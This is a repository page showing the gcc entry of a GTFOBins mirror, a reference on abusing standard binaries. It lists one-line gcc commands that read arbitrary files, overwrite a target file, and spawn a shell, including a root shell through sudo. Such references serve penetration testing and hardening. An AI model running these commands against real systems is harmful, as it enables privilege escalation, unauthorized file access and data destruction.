This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
bbb694faaf411410d2897338d2564afc883cbd0e
GTFOBins.github.io
/
_gtfobins
/
gcc.md
Andrea Cardaci
d81463fb82
Fix YAML style
2021-04-26 16:11:33 +02:00
327 B
Raw
Blame
History
functions
functions
file-read
file-write
shell
sudo
code
LFILE=file_to_read gcc -x c -E "$LFILE"
code
LFILE=file_to_delete gcc -xc /dev/null -o $LFILE
code
gcc -wrapper /bin/sh,-s .
code
sudo gcc -wrapper /bin/sh,-s .
Reference in New Issue
View Git Blame
Copy Permalink